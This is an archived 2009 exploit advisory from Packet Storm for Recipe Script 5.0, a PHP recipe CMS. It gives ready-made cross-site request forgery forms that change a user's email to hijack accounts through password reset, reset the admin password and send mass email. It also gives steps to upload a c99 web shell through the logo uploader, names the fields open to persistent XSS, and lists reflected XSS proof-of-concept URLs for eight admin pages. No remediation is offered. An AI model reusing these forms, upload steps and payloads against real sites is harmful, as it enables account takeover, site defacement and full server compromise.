what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Recipe Script 5.0 XSS / XSRF / Shell Upload

Recipe Script 5.0 XSS / XSRF / Shell Upload
Posted Dec 16, 2009
Authored by Milos Zivanovic

Recipe Script version 5.0 suffers from shell upload, cross site request forgery, and cross site scripting vulnerabilities.

tags | exploit, shell, vulnerability, xss, file upload, csrf
SHA-256 | 34e728b349149153aa4320e019136c10f496f3a51b36d90cd98f1a4457d600b9

Recipe Script 5.0 XSS / XSRF / Shell Upload

Change Mirror Download
[#-----------------------------------------------------------------------------------------------#]
[#] Title: Recipe Script v5.0 (Shell Upload/XSRF/XSS) Multiple Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 16. December 2009.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Recipe Script
[#] Version: 5.0
[#] Platform: PHP
[#] Link: http://www.recipescript.com/index.php
[#] Price: ~98 USD
[#] Vulnerability: Multiple Vulnerabilities such as XSRF, Shell Upload, XSS
[#-----------------------------------------------------------------------------------------------#]

[#]Content
|--User Panel
| |--Change user email
|
|--Admin Panel
|--Shell upload vulnerability
|
|--XSRF
| |--Change admin password
| |--Send email to subscribers
|
|--Persistent XSS
| |--Edit footer
| |--Add/Edit Category
| |--Add/Edit Recipe
| |--Add/Edit Menu
| |--Add/Edit Block
|
|--XSS
|--XSS in /admin/recipes.php
|--XSS in /admin/categories.php
|--XSS in /admin/all_comments.php
|--XSS in /admin/users.php
|--XSS in /admin/comments.php
|--XSS in /admin/menus.php
|--XSS in /admin/links.php
|--XSS in /admin/banners.php


[#]User Panel

[*]Change user email (XSRF)

We can use the following exploit to change users email and then go to
'forget your password' form
and it will send us password on the email.

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/recipes/update_profile.php" method="POST">
<input name="first_name" type="text" value="DEMO">
<input name="last_name" type="text" value="USER">
<input name="website" type="text" value="website.com">
<input name="country" type="text" value="Moon State">
<input name="email" type="text" value="our@email.com">
<input type="checkbox" name="subscribed" value="1">
<input type="submit" name="Submit" value="Update">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[#]Admin Panel

[*]Shell upload vulnerability

Visit link:
http://localhost/recipes/admin/add_logo.php
Upload your shell (ex. c99shell.php)
Your shell should be here:
http://localhost/recipes/admin/uploads/logo_.php
If by any chanse is not there, open this page:
http://localhost/recipes/admin/logo.php
You'll see broken html object, right click > properties, and you will
see the link to your shell

[#]XSRF (Cross Site Request Forgery)

[*]Change admin password

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/recipes/admin/adminpass.php" method="POST">
<input type="password" name="AdminPass" value="hacked">
<input type="password" name="cAdminPass" value="hacked">
<input type="submit" name="submit" value="Update Password">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[-]Send email to subscribers

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/recipes/admin/send_email_users.php"
method="POST">
<input type="hidden" name="from_email" value="support@site.com">
<input type="hidden" name="subject" value="Subject">
<input type="hidden" name="message" value="Free your mind and the
ass will follow!">
<input type="hidden" name="emailtype" value="">
<input type="submit" name="Submit" value="Send">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[#]Persistent XSS (Cross Site Scripting)

[+]Edit footer (Persistent XSS)

script: http://localhost/recipes/admin/edit_footertext.php
is vulnerable to persistent xss attack, we can inject our malicious
code in there and it will be
on every page.

[*]Add/Edit Category (Persistent XSS)

Add: http://localhost/recipes/admin/add_category.php
Edit: http://localhost/recipes/admin/categories.php
Field that i tested is 'Category name'. We can inject our malicious
code there and it will be seen
on every page.

[+]Add/Edit Recipe (Persistent XSS)

Add: http://localhost/recipes/admin/add_recipe.php
Edit: http://localhost/recipes/admin/recipes.php
Vulnerable field is 'Recipe name'.

[+]Add/Edit Menu (Persistent XSS)

Add: http://localhost/recipes/admin/add_menu.php
Edit: http://localhost/recipes/admin/menus.php
Vulnerable field is 'Menu name'. This is seen in every page in the
front end of the cms.

[+]Add/Edit Block (Persistent XSS)

Add: http://localhost/recipes/admin/add_block.php
Edit: http://localhost/recipes/admin/blocks.php
Vulnerable field is 'Block name'.

[#]XSS (Cross Site Scripting)

I used following javascript in testing: <script>alert(1)</script>

[-]XSS in /admin/recipes.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/recipes.php?searchword="[XSS]
http://localhost/recipes/admin/recipes.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]XSS in /admin/categories.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/categories.php?searchword="[XSS]
http://localhost/recipes/admin/categories.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]XSS in /admin/all_comments.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/all_comments.php?searchword="[XSS]
http://localhost/recipes/admin/all_comments.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]XSS in /admin/users.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/users.php?searchword="[XSS]
http://localhost/recipes/admin/users.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]XSS in /admin/comments.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/comments.php?searchword="[XSS]
http://localhost/recipes/admin/comments.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]XSS in /admin/menus.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/menus.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]XSS in /admin/links.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/links.php?searchword="[XSS]
http://localhost/recipes/admin/links.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]XSS in /admin/banners.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/banners.php?searchword="[XSS]
http://localhost/recipes/admin/banners.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[#]EOF
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close